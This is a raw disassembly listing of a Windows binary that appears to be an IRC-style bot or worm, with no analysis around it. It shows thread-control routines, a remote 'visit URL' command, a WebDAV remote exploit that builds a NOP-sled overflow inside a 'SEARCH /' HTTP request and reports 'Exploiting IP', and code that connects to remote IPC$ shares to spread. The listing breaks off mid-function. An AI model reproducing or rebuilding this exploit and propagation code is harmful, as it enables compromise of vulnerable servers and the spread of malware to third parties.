mov dword_43B240[esi], ebx
mov dword_43B244[esi], ebx
jbe short loc_4137F2
push eax
call sub_4090E5
pop ecx
loc_4137F2: ; CODE XREF: sub_41379F+4A�j
mov [edi], ebx
lea edi, dword_43B24C[esi]
push dword ptr [edi]
mov byte ptr dword_43B040[esi], bl
mov byte_43B258[esi], bl
call dword_43A4B0 ; closesocket
lea esi, dword_43B250[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_43A4B0 ; closesocket
mov [esi], ebx
pop edi
loc_413821: ; CODE XREF: sub_41379F+D�j
; sub_41379F+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_41379F endp
; =============== S U B R O U T I N E =======================================
sub_413827 proc near ; CODE XREF: sub_4034BE+18�p
; sub_409806+425A�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43B040
loc_413833: ; CODE XREF: sub_413827+2A�j
cmp byte ptr [esi], 0
jz short loc_413844
push edi
call sub_41379F
test eax, eax
pop ecx
jz short loc_413844
inc ebx
loc_413844: ; CODE XREF: sub_413827+F�j
; sub_413827+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_47FDD0
jl short loc_413833
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_413827 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413859 proc near ; CODE XREF: sub_409806+1CD8�p
; sub_409806+1D43�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43B244
loc_41386D: ; CODE XREF: sub_413859+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41388F
test edi, edi
jle short loc_413881
cmp [esi], edi
jz short loc_413881
cmp ebx, edi
jnz short loc_41388F
loc_413881: ; CODE XREF: sub_413859+1E�j
; sub_413859+22�j
push ebx
call sub_41379F
test eax, eax
pop ecx
jz short loc_41388F
inc [ebp+var_4]
loc_41388F: ; CODE XREF: sub_413859+1A�j
; sub_413859+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_47FFD4
jl short loc_41386D
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_413859 endp
; =============== S U B R O U T I N E =======================================
sub_4138A6 proc near ; CODE XREF: sub_4010CA+B�p
; sub_401141+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43B240
loc_4138AD: ; CODE XREF: sub_4138A6+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_4138B6
inc eax
loc_4138B6: ; CODE XREF: sub_4138A6+D�j
add ecx, 234h
cmp ecx, offset dword_47FFD0
jl short loc_4138AD
retn
sub_4138A6 endp
; =============== S U B R O U T I N E =======================================
sub_4138C5 proc near ; CODE XREF: sub_409806+4BA6�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_43B240
push esi
loc_4138CF: ; CODE XREF: sub_4138C5+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_4138E8
add ecx, 234h
inc edx
cmp ecx, offset dword_47FFD0
jl short loc_4138CF
pop esi
retn
; ---------------------------------------------------------------------------
loc_4138E8: ; CODE XREF: sub_4138C5+10�j
mov eax, edx
pop esi
retn
sub_4138C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4138EC proc near ; CODE XREF: sub_409806+21D7�p
; sub_409806+52D6�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_413905
push [ebp+arg_1C]
call sub_416C92
pop ecx
loc_413905: ; CODE XREF: sub_4138EC+E�j
push eax
push [ebp+arg_18]
call sub_413859
test eax, eax
pop ecx
pop ecx
jle short loc_413931
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_416905
add esp, 14h
jmp short loc_41394B
; ---------------------------------------------------------------------------
loc_413931: ; CODE XREF: sub_4138EC+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_416905
add esp, 10h
loc_41394B: ; CODE XREF: sub_4138EC+43�j
cmp [ebp+arg_C], 0
jnz short loc_41396B
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_41396B: ; CODE XREF: sub_4138EC+63�j
lea eax, [ebp+var_200]
push eax
call sub_401ECD
pop ecx
leave
retn
sub_4138EC endp
; =============== S U B R O U T I N E =======================================
sub_41397A proc near ; CODE XREF: sub_401950+206�p
; sub_401B65+24A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_43B254[eax], ecx
mov dword_43B240[eax], ecx
mov dword_43B244[eax], ecx
mov dword_43B248[eax], ecx
mov dword_43B24C[eax], ecx
mov dword_43B250[eax], ecx
mov byte ptr dword_43B040[eax], cl
mov byte_43B258[eax], cl
retn
sub_41397A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4139B7 proc near ; DATA XREF: sub_409806+5139�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_413721
push [ebp+74h+var_14]
call sub_41397A
add esp, 14h
push 0
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4139B7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413A01 proc near ; DATA XREF: sub_409806+3ED6�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 65Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 65h
pop ecx
push 20h
mov esi, eax
xor edx, edx
inc edx
lea edi, [ebp+74h+var_35C]
rep movsd
pop ecx
push 20h
xor ebx, ebx
mov [eax+190h], edx
xor eax, eax
lea edi, [ebp+74h+var_148]
rep stosd
pop ecx
push 20h
lea edi, [ebp+74h+var_1C8]
rep stosd
pop ecx
push 40h
lea edi, [ebp+74h+var_C8]
rep stosd
pop ecx
lea edi, [ebp+74h+var_65C]
rep stosd
push 0Fh
pop ecx
lea edi, [ebp+74h+var_48]
rep stosd
lea eax, [ebp+74h+var_358]
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_4], ebx
mov [ebp+74h+var_C], offset asc_42BA30 ; "*/*"
mov [ebp+74h+var_48], 3Ch
mov [ebp+74h+var_34], edx
mov [ebp+74h+var_28], edx
mov [ebp+74h+var_20], edx
mov [ebp+74h+var_18], edx
lea esi, [eax+1]
loc_413A86: ; CODE XREF: sub_413A01+8A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_413A86
lea ecx, [ebp+74h+var_48]
push ecx
sub eax, esi
push ebx
push eax
lea eax, [ebp+74h+var_358]
push eax
call dword_43A310 ; InternetCrackUrlA
test eax, eax
jnz short loc_413ABF
lea eax, [ebp+74h+var_55C]
push offset aVisitInvalidUr ; "[VISIT]: Invalid URL."
push eax
call sub_416905
mov esi, [ebp+74h+var_8]
jmp loc_413BAE
; ---------------------------------------------------------------------------
loc_413ABF: ; CODE XREF: sub_413A01+A3�j
cmp [ebp+74h+var_34], ebx
jbe short loc_413AD9
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_148]
push [ebp+74h+var_38]
push eax
call sub_4169C0
add esp, 0Ch
loc_413AD9: ; CODE XREF: sub_413A01+C1�j
cmp [ebp+74h+var_28], ebx
movzx esi, [ebp+74h+var_30]
jbe short loc_413AF7
push [ebp+74h+var_28]
lea eax, [ebp+74h+var_1C8]
push [ebp+74h+var_2C]
push eax
call sub_4169C0
add esp, 0Ch
loc_413AF7: ; CODE XREF: sub_413A01+DF�j
cmp [ebp+74h+var_20], ebx
jbe short loc_413B0E
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_C8]
push [ebp+74h+var_24]
push eax
call sub_4169C0
add esp, 0Ch
loc_413B0E: ; CODE XREF: sub_413A01+F9�j
cmp [ebp+74h+var_18], ebx
jbe short loc_413B28
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_65C]
push [ebp+74h+var_1C]
push eax
call sub_4169C0
add esp, 0Ch
loc_413B28: ; CODE XREF: sub_413A01+110�j
push ebx
push ebx
push 3
lea eax, [ebp+74h+var_C8]
push eax
lea eax, [ebp+74h+var_1C8]
push eax
push esi
lea eax, [ebp+74h+var_148]
push eax
push dword_43A4E8
call dword_43A3D4 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jnz short loc_413B58
push offset aVisitCouldNotO ; "[VISIT]: Could not open a connection."
jmp short loc_413BA2
; ---------------------------------------------------------------------------
loc_413B58: ; CODE XREF: sub_413A01+14E�j
push ebx
push 200h
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2D8]
push eax
push ebx
lea eax, [ebp+74h+var_65C]
push eax
push ebx
push esi
call dword_43A3C4 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+74h+var_4], eax
jnz short loc_413B87
push offset aVisitFailedToC ; "[VISIT]: Failed to connect to HTTP serv"...
jmp short loc_413BA2
; ---------------------------------------------------------------------------
loc_413B87: ; CODE XREF: sub_413A01+17D�j
push ebx
push ebx
push ebx
push ebx
push eax
call dword_43A4EC ; HttpSendRequestA
test eax, eax
jz short loc_413B9D
push offset aVisitUrlVisite ; "[VISIT]: URL visited."
jmp short loc_413BA2
; ---------------------------------------------------------------------------
loc_413B9D: ; CODE XREF: sub_413A01+193�j
push offset aVisitFailedToG ; "[VISIT]: Failed to get requested URL fr"...
loc_413BA2: ; CODE XREF: sub_413A01+155�j
; sub_413A01+184�j ...
lea eax, [ebp+74h+var_55C]
push eax
call sub_416905
loc_413BAE: ; CODE XREF: sub_413A01+B9�j
cmp [ebp+74h+var_1D4], ebx
pop ecx
pop ecx
jnz short loc_413BDB
push ebx
push [ebp+74h+var_1D0]
lea eax, [ebp+74h+var_55C]
push eax
lea eax, [ebp+74h+var_258]
push eax
push [ebp+74h+var_35C]
call sub_405D20
add esp, 14h
loc_413BDB: ; CODE XREF: sub_413A01+1B5�j
lea eax, [ebp+74h+var_55C]
push eax
call sub_401ECD
pop ecx
push esi
call dword_43A3FC ; InternetCloseHandle
push [ebp+74h+var_4]
call dword_43A3FC ; InternetCloseHandle
push [ebp+74h+var_1D8]
call sub_41397A
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_413A01 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413C0C proc near ; CODE XREF: sub_401950+1D7�p
; DATA XREF: .text:off_42E06C�o
var_1210 = byte ptr -1210h
var_11AC = byte ptr -11ACh
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
mov eax, 1210h
call sub_416B20
push 6
push 1
push 2
call dword_43A39C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_413C31
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_413C31: ; CODE XREF: sub_413C0C+1F�j
push ebx
push esi
push edi
push [ebp+arg_A0]
call dword_43A4F4 ; ntohs
lea eax, [ebp+arg_4]
push eax
call dword_43A414 ; inet_addr
push 186A0h
call sub_416DAF
mov edi, 1000h
push edi
mov ebx, eax
call sub_416DAF
pop ecx
pop ecx
push offset byte_42FD48
push [ebp+arg_0]
mov esi, eax
mov [ebp+var_C], esi
call sub_408852
pop ecx
push eax
push edi
push esi
call sub_412078
add esp, 10h
test eax, eax
mov [ebp+var_8], eax
jnz short loc_413CA6
push ebx
call sub_416C97
push esi
call sub_416C97
pop ecx
pop ecx
push [ebp+var_10]
loc_413C99: ; CODE XREF: sub_413C0C+27B�j
call dword_43A4B0 ; closesocket
xor eax, eax
jmp loc_413F23
; ---------------------------------------------------------------------------
loc_413CA6: ; CODE XREF: sub_413C0C+7A�j
push 19h
mov eax, 90909090h
pop ecx
lea edi, [ebp+var_1210]
rep stosd
mov ecx, [ebp+var_8]
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_11AC]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov ecx, 61A8h
mov edi, ebx
rep stosd
mov esi, offset aSearch ; "SEARCH /"
mov edi, ebx
movsd
movsd
mov eax, ebx
movsb
lea esi, [eax+1]
loc_413CE7: ; CODE XREF: sub_413C0C+E0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413CE7
sub eax, esi
mov esi, eax
lea edx, [esi+1]
lea eax, [esi+866h]
cmp edx, eax
mov byte ptr [esi+ebx], 90h
jnb short loc_413D25
sub eax, edx
dec eax
shr eax, 1
inc eax
mov ecx, eax
mov [ebp+var_4], ecx
shr ecx, 1
lea edi, [edx+ebx]
mov eax, 0B102B102h
rep stosd
adc ecx, ecx
rep stosw
mov eax, [ebp+var_4]
lea edx, [edx+eax*2]
loc_413D25: ; CODE XREF: sub_413C0C+F5�j
mov eax, offset loc_430328
mov edi, eax
lea ecx, [edi+1]
mov [ebp+var_4], ecx
loc_413D32: ; CODE XREF: sub_413C0C+12B�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_413D32
sub edi, [ebp+var_4]
jmp short loc_413D53
; ---------------------------------------------------------------------------
loc_413D3E: ; CODE XREF: sub_413C0C+155�j
lea ecx, [edi+1]
mov byte ptr [edx+ebx], 90h
inc edx
mov [ebp+var_4], ecx
loc_413D49: ; CODE XREF: sub_413C0C+142�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_413D49
sub edi, [ebp+var_4]
loc_413D53: ; CODE XREF: sub_413C0C+130�j
mov ecx, esi
sub ecx, edi
add ecx, 0FFFFh
cmp edx, ecx
mov edi, eax
jb short loc_413D3E
lea esi, [edi+1]
loc_413D66: ; CODE XREF: sub_413C0C+15F�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_413D66
sub edi, esi
mov ecx, edi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_413D87: ; CODE XREF: sub_413C0C+181�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_413D87
mov esi, offset aHttp1_1 ; " HTTP/1.1\r\n"
movsd
movsd
movsd
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
mov eax, esi
lea edi, [eax+1]
loc_413DA1: ; CODE XREF: sub_413C0C+19A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413DA1
sub eax, edi
mov edi, eax
mov eax, ebx
lea ecx, [eax+1]
loc_413DB1: ; CODE XREF: sub_413C0C+1AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413DB1
sub eax, ecx
mov ecx, [ebp+var_8]
add edi, ecx
push edi
lea ecx, [ebp+arg_4]
push ecx
add eax, ebx
push offset aHostSContentTy ; "Host: %s\r\nContent-Type: text/xml\r\nConte"...
push eax
call sub_416905
add esp, 10h
mov eax, esi
loc_413DD6: ; CODE XREF: sub_413C0C+1CF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413DD6
mov edi, ebx
sub eax, esi
dec edi
loc_413DE2: ; CODE XREF: sub_413C0C+1DC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_413DE2
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_413DFD: ; CODE XREF: sub_413C0C+1F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413DFD
sub eax, esi
mov ecx, eax
mov eax, 1010101h
lea edi, [ecx+ebx]
stosb
mov eax, ebx
lea esi, [eax+1]
loc_413E16: ; CODE XREF: sub_413C0C+20F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E16
sub eax, esi
mov ecx, eax
mov eax, 90909090h
lea edi, [ecx+ebx]
stosw
stosb
mov eax, ebx
lea esi, [eax+1]
loc_413E31: ; CODE XREF: sub_413C0C+22A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E31
mov ecx, [ebp+var_8]
sub eax, esi
lea edi, [eax+ebx]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_1210]
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_413E59: ; CODE XREF: sub_413C0C+252�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E59
sub eax, esi
mov esi, [ebp+var_10]
xor edi, edi
push edi
push eax
push ebx
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_413E8C
push ebx
call sub_416C97
push [ebp+var_C]
call sub_416C97
pop ecx
pop ecx
push esi
jmp loc_413C99
; ---------------------------------------------------------------------------
loc_413E8C: ; CODE XREF: sub_413C0C+268�j
push edi
push 1388h
push ebx
push esi
call dword_43A304 ; recv
push ebx
call sub_416C97
push [ebp+var_C]
call sub_416C97
pop ecx
pop ecx
push esi
call dword_43A4B0 ; closesocket
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_210]
push 200h
push eax
call sub_416B5D
add esp, 14h
cmp [ebp+arg_B4], edi
jnz short loc_413F02
push edi
push [ebp+arg_B0]
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_413F02: ; CODE XREF: sub_413C0C+2D7�j
lea eax, [ebp+var_210]
push eax
call sub_401ECD
mov eax, [ebp+arg_A8]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_413F23: ; CODE XREF: sub_413C0C+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_413C0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F28 proc near ; CODE XREF: sub_413FBC+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_413F49
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_413F49: ; CODE XREF: sub_413F28+19�j
push ebx
push esi
loc_413F4B: ; CODE XREF: sub_413F28+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_413F59
cmp [ebp+var_4], eax
jnz short loc_413FA1
loc_413F59: ; CODE XREF: sub_413F28+2A�j
test edi, edi
jnz short loc_413F96
cmp bl, 2Dh
jnz short loc_413F8A
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_413F8A
cmp al, 5Dh
jz short loc_413F8A
cmp [ebp+var_4], edi
jnz short loc_413F8A
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_413F96
cmp bl, al
jg short loc_413F96
mov [edx], esi
jmp short loc_413F93
; ---------------------------------------------------------------------------
loc_413F8A: ; CODE XREF: sub_413F28+38�j
; sub_413F28+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_413F96
loc_413F93: ; CODE XREF: sub_413F28+60�j
xor edi, edi
inc edi
loc_413F96: ; CODE XREF: sub_413F28+33�j
; sub_413F28+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_413F4B
; ---------------------------------------------------------------------------
loc_413FA1: ; CODE XREF: sub_413F28+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_413FAE
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_413FAE: ; CODE XREF: sub_413F28+7E�j
cmp edi, eax
jnz short loc_413FB7
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_413FB7: ; CODE XREF: sub_413F28+88�j
mov eax, edi
pop edi
leave
retn
sub_413F28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FBC proc near ; CODE XREF: sub_409806+6197�p
; sub_414050+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_41401E
; ---------------------------------------------------------------------------
loc_413FC8: ; CODE XREF: sub_413FBC+66�j
cmp eax, 1
jnz short loc_41402F
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41402F
cmp cl, 2Ah
jz short loc_414007
cmp cl, 3Fh
jz short loc_413FEC
cmp cl, 5Bh
jz short loc_413FF1
xor eax, eax
cmp cl, dl
setz al
loc_413FEC: ; CODE XREF: sub_413FBC+22�j
inc [ebp+arg_4]
jmp short loc_41401A
; ---------------------------------------------------------------------------
loc_413FF1: ; CODE XREF: sub_413FBC+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_413F28
mov esi, [ebp+arg_0]
jmp short loc_414018
; ---------------------------------------------------------------------------
loc_414007: ; CODE XREF: sub_413FBC+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_414050
mov esi, [ebp+arg_0]
dec esi
loc_414018: ; CODE XREF: sub_413FBC+49�j
pop ecx
pop ecx
loc_41401A: ; CODE XREF: sub_413FBC+33�j
inc esi
mov [ebp+arg_0], esi
loc_41401E: ; CODE XREF: sub_413FBC+A�j
mov cl, [esi]
test cl, cl
jnz short loc_413FC8
jmp short loc_41402F
; ---------------------------------------------------------------------------
loc_414026: ; CODE XREF: sub_413FBC+76�j
cmp eax, 1
jnz short loc_41404B
inc esi
mov [ebp+arg_0], esi
loc_41402F: ; CODE XREF: sub_413FBC+F�j
; sub_413FBC+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_414026
cmp eax, 1
jnz short loc_41404B
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_41404B
cmp byte ptr [esi], 0
jnz short loc_41404B
xor eax, eax
inc eax
jmp short loc_41404D
; ---------------------------------------------------------------------------
loc_41404B: ; CODE XREF: sub_413FBC+6D�j
; sub_413FBC+7B�j ...
xor eax, eax
loc_41404D: ; CODE XREF: sub_413FBC+8D�j
pop esi
pop ebp
retn
sub_413FBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414050 proc near ; CODE XREF: sub_413FBC+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_41407F
; ---------------------------------------------------------------------------
loc_41406A: ; CODE XREF: sub_414050+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_41407B
cmp cl, 2Ah
jnz short loc_414087
cmp cl, 3Fh
jnz short loc_41407D
loc_41407B: ; CODE XREF: sub_414050+1F�j
inc dword ptr [edi]
loc_41407D: ; CODE XREF: sub_414050+29�j
inc dword ptr [esi]
loc_41407F: ; CODE XREF: sub_414050+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_41406A
loc_414087: ; CODE XREF: sub_414050+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_414096
loc_41408C: ; CODE XREF: sub_414050+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_41408C
loc_414096: ; CODE XREF: sub_414050+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_4140B3
cmp [eax], bl
jz short loc_4140A6
xor eax, eax
jmp short loc_414118
; ---------------------------------------------------------------------------
loc_4140A6: ; CODE XREF: sub_414050+50�j
cmp dl, bl
jnz short loc_4140B3
cmp [eax], bl
jnz short loc_4140B3
xor eax, eax
inc eax
jmp short loc_414118
; ---------------------------------------------------------------------------
loc_4140B3: ; CODE XREF: sub_414050+4C�j
; sub_414050+58�j ...
push ecx
push eax
call sub_413FBC
test eax, eax
pop ecx
pop ecx
jnz short loc_414102
loc_4140C0: ; CODE XREF: sub_414050+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_4140E4
loc_4140CC: ; CODE XREF: sub_414050+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_4140E4
cmp [eax], bl
jz short loc_4140F9
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_4140CC
loc_4140E4: ; CODE XREF: sub_414050+7A�j
; sub_414050+81�j
cmp [eax], bl
jz short loc_4140F9
push eax
push dword ptr [esi]
call sub_413FBC
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4140FE
; ---------------------------------------------------------------------------
loc_4140F9: ; CODE XREF: sub_414050+85�j
; sub_414050+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_4140FE: ; CODE XREF: sub_414050+A7�j
cmp eax, ebx
jnz short loc_4140C0
loc_414102: ; CODE XREF: sub_414050+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_414115
mov eax, [esi]
cmp [eax], bl
jnz short loc_414115
mov [ebp+var_4], 1
loc_414115: ; CODE XREF: sub_414050+B6�j
; sub_414050+BC�j
mov eax, [ebp+var_4]
loc_414118: ; CODE XREF: sub_414050+54�j
; sub_414050+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_414050 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41411D proc near ; CODE XREF: .text:00414548�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_42BAA8 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_124], bl
lea edi, [ebp+var_123]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+var_124]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_4185C0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_4185C0
mov esi, [ebp+arg_4]
add esp, 10h
lea eax, [ebp+var_354]
push ebx
mov [esi+14h], eax
mov eax, offset dword_42BAA4
push eax
push eax
push esi
mov [esi+4], ebx
mov [esi+10h], ebx
mov [esi+1Ch], ebx
call dword_43A4D8
cmp eax, 5
mov edi, 4C3h
jz short loc_4141DC
cmp eax, edi
jnz short loc_4141E6
loc_4141DC: ; CODE XREF: sub_41411D+B9�j
push ebx
push ebx
push ebx
push esi
call dword_43A4D8
